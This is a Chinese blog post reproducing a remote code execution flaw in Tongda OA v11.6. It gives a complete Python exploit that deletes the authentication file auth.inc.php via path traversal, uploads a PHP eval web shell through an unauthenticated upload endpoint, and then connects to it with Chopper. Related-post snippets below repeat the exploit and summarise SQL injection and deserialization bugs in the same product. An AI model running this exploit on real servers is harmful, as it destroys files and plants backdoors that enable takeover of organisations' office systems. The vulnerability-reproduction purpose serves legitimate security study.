漏洞复现系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)

最新推荐文章于 2025-04-01 17:41:06 发布
最新推荐文章于 2025-04-01 17:41:06 发布
阅读量2.7k 收藏 2
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40007043/article/details/108120017
版权

一、影响版本 11.6
二、复现过程
1.下载11.6版本oa,下载地址:http://www.kxdw.com/soft/23114.html
2.安装
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3.exp脚本

import requests
target="http://ip:port/"     //此处填写上面安装oa的ip及端口
payload="<?php eval($_POST['hahaha']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url,files=files)
url=target+"/_deconf.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

4.然后执行该exp的效果如下图
在这里插入图片描述
5.用菜刀连接该后门,如下
在这里插入图片描述

[ 漏洞复现篇 ] 通达 OA11.6 文件上传+RCE 漏洞复现
qq_51577576的博客
04-14 5183
一、漏洞编号 二、漏洞靶场 三、漏洞影响版本 四、FOFA Dork/Google Dork 五、利用漏洞风险 六、漏洞修复方案 七、漏洞利用过程
漏洞复现-通达OA通达OA report_bi存在前台SQL注入漏洞
xiaokp7的博客
02-18 686
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。
通达-OA-V11.6
07-20
通达-OA-V11 外网使用最好不要用默认的80端口,覆盖时如果不能完全替换,先用通达的应用服务控制中心停掉通达所有服务再进行替换即可。
2020-08-22通达OA多枚0day漏洞复现
thelostworld
08-23 1515
通达OA多枚0day漏洞复现 刚刚群里发了一篇文章-研究复现一波,通达OA多枚0day漏洞poc出来了。 影响范围:通达OA11.5版本 一、环境搭建: 安装11.5版本 安装完成: 服务器配置: 访问IP服务正常: 成功登录系统: 二、漏洞验证复现 漏洞一:SQL注入 POC: POST/general/appbuilder/web/calendar/calendarlist/getcallistHTTP/1.1 问题关键参数:st
2025版最新关于HW护网行动的一些知识,零基础入门到精通,收藏这篇就够了
最新发布
logic1001的博客
04-01 1178
护网行动”是国家应对网络安全问题所做的重要布局之一。“护网行动”从2016年开始,随着我国对网络安全的重视,涉及单位不断扩大,越来越多都加入到“护网2019”行动中,网络安全对抗演练越来越贴近实际情况,各机构对待网络安全需求也从被动构建,升级为业务保障刚需。
通达OA远程代码执行漏洞通告
爱国小白帽
03-18 2358
通达OA远程代码执行漏洞通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年03月18日, 360CERT监测发现通达OA官方在03月13日发布了针对勒索病毒事件的紧急更新。根据分析该事件是通达OA中存在的两枚漏洞(文件上传漏洞,文件包含漏洞)所导致。 通达OA是由北京通达信科科技有限公司研发的一款通用型OA产品,涵盖了个人事务...
漏洞复现-通达OA v11.6 report_bi.func.php SQL注入
玄道的网安博客
08-13 555
在自定义函数内首先查找了第一个单引号出现位置然后将出现位置的字符串长度给加到了pos这个变量内。Mysql里面有一个符号 @`` 可以将``内的字符串转换成变量所以最后poc就出来了。所以需要将我们需要注入的sql语句作为被替换的数据传入检测 然后再将语句前的单引号闭合。然后进入另外一个循环查找单引号和注释符直到没有查找到后跳出循环。总结查找传入sql查询里面的数据(即为单引号的内容)替换成\$s\$只要没有跳出循环 clean就继续拼接\$s\$然后。
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA V11.6 RCE(远程代码执行)漏洞复现
weixin_39811856的博客
02-25 535
根据脚本来瞅瞅这次的问题出在print.php这个问题 1.这个GET没有进行身份验证,所以可以随意访问 2.unlink() 函数删除文件。 <?php $s_tmp = __DIR__ . '/../../../../logs/appbuilder/logs'; $s_tmp .= '/' . $_GET['guid']; if (file_exists($s_tmp)) { $arr_data = unserialize(file_get_contents($s_tmp.
通达OA v11.6 RCE漏洞分析
z1feiyu
08-19 1576
hvv爆出rce按照网上exp进行复现成功获取shell,复现方式自行搜索(很多) 比较好奇 为什么要删除文件 这里从exp着手分析 import requests target="http://192.168.159.137:8080/" payload="<?php eval($_POST['agan']);?>" print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
sql注入漏洞_通达OA 后台多个SQL注入漏洞
weixin_39820244的博客
12-09 920
近日,深信服安全团队监测到通达OA后台存在多个SQL注入漏洞的信息。漏洞利用需要具备普通用户权限,攻击者可通过拼接SQL语句,来执行恶意的SQL代码, 或获取数据库敏感数据。漏洞名称:通达OA 后台多个SQL注入漏洞威胁等级:高危影响范围:通达OA < V11.6通达OA <= V11.7漏洞类型:SQL注入利用难度:中等漏洞分析1通达OA介绍通达OA(Office An...
注册框sql注入_通达OA多处SQL注入漏洞
weixin_39996234的博客
11-16 531
通达OA最近悄咪咪的更新了一次,以下所发漏洞在新版基本已经失效超全局变量覆盖导致SQL注入首先是全局初始化参数:if (0 < count($_GET)) { foreach ($_GET as $s_key => $s_value ) { if (!is_array($s_value)) { $_GET[$s_key] = adds...
通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现
Adminxe的博客
09-22 1734
0x00 简介 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。 今天看了好多通达OA的文章,根据护网中出现的一些0day,进行一波分析,其中感觉9hu大佬分析的很到位,然后来以此为基准,一起来看一下这个影响较深的漏洞。然后我自己感觉,出现的漏洞只是表面的一些,其中还有肯定是未公布的,包括我之前在别的版本..
通达OA任意用户伪造登录漏洞分析与复现
weixin_45439432的博客
04-23 2496
2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件控制网站服务器。通达OA通达信科打造的协同办公平台,涵盖了工作流程、电子邮件、即时通讯、公告通知、新闻、日程安排、工作日志、知识管理,等近300个功能模块,国内用户众多。 补丁对比修改了如下文件: ...
2022-10-10(通达OA SQL注入漏洞)
qq_45751902的博客
10-10 2225
经过测试发现过滤了单引号,对r字符进行转换成16进制,通过手工最终获得数据库用户名root。使用手工注入,经过测试发现过滤了单引号,对r字符进行转换成16进制(用户名是root)首先创建一个普通账户 lisi:lisi123456。中存在 一个$_GET[“id”];参数位置:SORT_ID,FILE_SORT。发现时间明显变长了,再此证明id没有被过滤。登录账号是admin,密码为空。利用条件:一枚普通账号登录权限。利用条件:11.5版本无需登录。
通达OA系统11.2漏洞
qq_50854662的博客
12-02 5570
通达OA系统11.2版本为案例的Web渗透
【新】通达OA前台反序列化漏洞分析
C20220511的博客
08-07 2368
通达OA作为历史上出现漏洞较多的OA,在经过多轮的迭代之后已经很少前台的RCE漏洞了。对应12系列未做过多测试,本文提到的所有漏洞在最新版的通达12.4中已修复,使用此漏洞造成的任何攻击影响均与本文作者无关。在上面的方法中会对传入的Cookie值进行签名校验,校验的方法是validateData,其中$this->cookieValidationKey是签名的key。继续跟踪loadCookies方法,在这个方法中会调用unserialize方法对传入的Cookie的值进行反序列化。
漏洞复现通达OA moare接口反序列化漏洞
m0_46381222的博客
10-22 1119
漏洞复现通达OA moare接口反序列化漏洞
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值